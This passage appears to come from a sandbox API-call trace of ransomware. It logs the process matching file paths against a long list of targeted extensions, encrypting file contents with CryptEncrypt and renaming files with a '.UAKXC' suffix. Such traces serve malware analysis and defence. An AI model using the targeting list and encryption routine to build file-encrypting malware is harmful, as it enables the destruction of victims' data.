Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".grdb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".gwi") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".hdb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".his") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ib") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".idb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ihx") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".itdb") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".itw") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".jet") returned 0x0 [0161.031] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".jtx") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".kdb") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".kexi") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".kexic") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".kexis") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".lgc") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".lwx") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".maf") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".maq") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mar") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mas") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mav") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mdb") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mdf") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mpd") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mrg") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mud") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mwb") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".myd") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ndf") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nnt") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nrmlib") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ns2") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ns3") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".ns4") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nsf") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nv") returned 0x0 [0161.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nv2") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nwdb") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nyf") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".odb") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".oqy") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".orx") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".owc") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".p96") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".p97") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".pan") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".pdb") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".pdm") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".pnz") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".qry") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".qvd") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rbf") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rctd") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rod") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rodx") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rpd") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".rsd") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sbf") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".scx") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sdb") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sdc") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sdf") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sis") returned 0x0 [0161.033] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".spq") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sql") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sqlite") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sqlite3") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".te") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".temx") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".tmd") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".tps") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".trc") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".trm") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".udb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".udl") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".usr") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".v12") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vis") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vpd") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vvv") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".wdb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".wmdb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".wrk") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".xdb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".xld") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".xmlff") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".abcddb") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".abs") returned 0x0 [0161.034] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".abx") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".accdw") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".adn") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".db2") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".fm5") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".hjt") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".icg") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".icr") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".kdb") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".lut") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".maw") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mdn") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".mdt") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vdi") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vhd") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmdk") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".pvm") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmem") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmsn") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmsd") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".nvram") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmx") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".raw") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".qcow2") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".subvol") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".bin") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vsv") returned 0x0 [0161.035] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".avhd") returned 0x0 [0161.036] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmrs") returned 0x0 [0161.036] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vhdx") returned 0x0 [0161.036] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".avdx") returned 0x0 [0161.036] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".vmcx") returned 0x0 [0161.036] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".iso") returned 0x0 [0161.036] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.036] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.259] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.259] SetEndOfFile (hFile=0x6f0) returned 1 [0161.259] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.259] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x646, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x646, lpOverlapped=0x0) returned 1 [0161.259] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.259] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x646, lpOverlapped=0x0) returned 1 [0161.259] CloseHandle (hObject=0x6f0) returned 1 [0161.260] GetProcessHeap () returned 0xea0000 [0161.260] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0161.260] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0161.260] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.UAKXC" [0161.260] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.uakxc")) returned 1 [0161.261] GetProcessHeap () returned 0xea0000 [0161.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0161.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6490 | out: hHeap=0xea0000) returned 1 [0161.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0161.261] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0161.261] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0161.261] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0161.262] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0161.370] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0161.370] GetLastError () returned 0x0 [0161.371] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=17456632) returned 1 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".4dd") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".4dl") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accdb") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accdc") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accde") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accdr") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accdt") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".accft") returned 0x0 [0161.371] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".adb") returned 0x0 [0161.371] StrStrIW 